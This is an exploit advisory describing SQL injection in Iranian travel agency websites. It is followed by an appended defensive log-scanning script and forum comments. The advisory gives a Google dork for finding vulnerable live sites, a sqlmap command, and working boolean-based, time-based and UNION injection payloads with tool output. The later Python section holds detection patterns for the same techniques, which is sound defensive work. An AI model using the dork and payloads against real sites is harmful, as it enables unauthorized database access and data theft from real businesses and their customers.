Websites of Iranian travel agencies By Aryan chehreghani

2020.05.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
# Exploit Title: [sql Injection]
# Google Dork: [inurl:php?id= intext:طراحی وب سایت : ایران تکنولوژی]
# Software Link: http://sqlmap.org/
# Dork CVE: N/A
# Date: [2020-05-24]
# Exploit Author: [Aryan Chehreghani | Ictus_TM]
# Team Channel : T.me/Ictus_TM
# Version: All Version
# Tested on: [Linux / Windows / ....]
______________________________________________________________________________________
SQLMAP :

[-] sqlmap -u "http://victim.com/fa/user/temp.php?pavc_njol=specific&id=87 --dbs
______________________________________________________________________________________
Testing :
Generic UNION query (NULL)
MySQL >= 5.0.12 AND time-based blind (query SLEEP)

[#] Testing Method:
[+] - boolean-based blind
[+] - time-based blind
______________________________________________________________________________________
|||||||||||||||||||||||
Parameter: sec (GET) ||
|||||||||||||||||||||||
EX Payload :
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: irantech_parvaz=specific&id=87' AND 4752=4752 AND 'qNzU'='qNzU

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: irantech_parvaz=specific&id=87' AND (SELECT 7431 FROM (SELECT(SLEEP(5)))QoYj) AND 'irYH'='irYH

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: irantech_parvaz=specific&id=-6437' UNION ALL SELECT NULL,NULL,CONCAT(0x71716b6b71,0x4c70465956435372566e62444e59784e476a416c6951684d4375484c4754566365796f4747777a79,0x71766b7071)-- -
---
[05:49:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
____________________________________________________________________________________
[=] T.me/Clvsornapv
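
A defender-side check for the three techniques reported above (boolean-based, time-based, UNION), added here as an example and not part of the original advisory. It assumes a combined-format web access log and that the `id` parameter is meant to be a plain integer; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One signature per technique named in the sqlmap output above.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}
# Assumption: Apache/nginx combined log format, request line in quotes.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not captured traffic).
_PFX = '192.0.2.10 - - [24/May/2020:05:48:01 +0000] "GET /fa/user/temp.php?irantech_parvaz=specific&id='
_SFX = ' HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'
SAMPLE_LOG = [
    _PFX + "87" + _SFX,
    _PFX + "87%27%20AND%204752%3D4752%20AND%20%27qNzU%27%3D%27qNzU" + _SFX,
    _PFX + "87%27%20AND%20(SELECT%207431%20FROM%20(SELECT(SLEEP(5)))QoYj)"
           "%20AND%20%27irYH%27%3D%27irYH" + _SFX,
    _PFX + "-6437%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL--%20-" + _SFX,
]

def classify_request(log_line):
    """Return a sorted list of findings for the id parameter of one log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    findings = set()
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    for name, value in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
        if name != "id":
            continue
        if not re.fullmatch(r"\d+", value):
            findings.add("non-numeric id")  # strongest signal: id must be an integer
        for label, pattern in SIGNATURES.items():
            if pattern.search(value):
                findings.add(label)
    return sorted(findings)

def scan(lines):
    """Map line index -> findings, omitting clean lines."""
    return {i: f for i, line in enumerate(lines) if (f := classify_request(line))}

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOG).items():
        print(idx, ", ".join(findings))
```

Log matching only surfaces probing after the fact; the fix in the application is to bind `id` as a parameter in a prepared statement (or cast it to an integer) instead of concatenating it into the query.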


mahdi Lord | Date: 2020-06-01 23:20 CET+1
very good! Excellent
H.A.M.E.R | Date: 2020-06-04 21:23 CET+1
Wow !!!
hi hacker | Date: 2020-06-15 15:11 CET+1
y r u hacking innocent people u ruthless criminal
ATTACKER | Date: 2020-12-08 23:18 CET+1
Excellent, mashallah, Tapesh security team
The Hacking | Date: 2021-04-27 00:29 CET+1
Good 💚
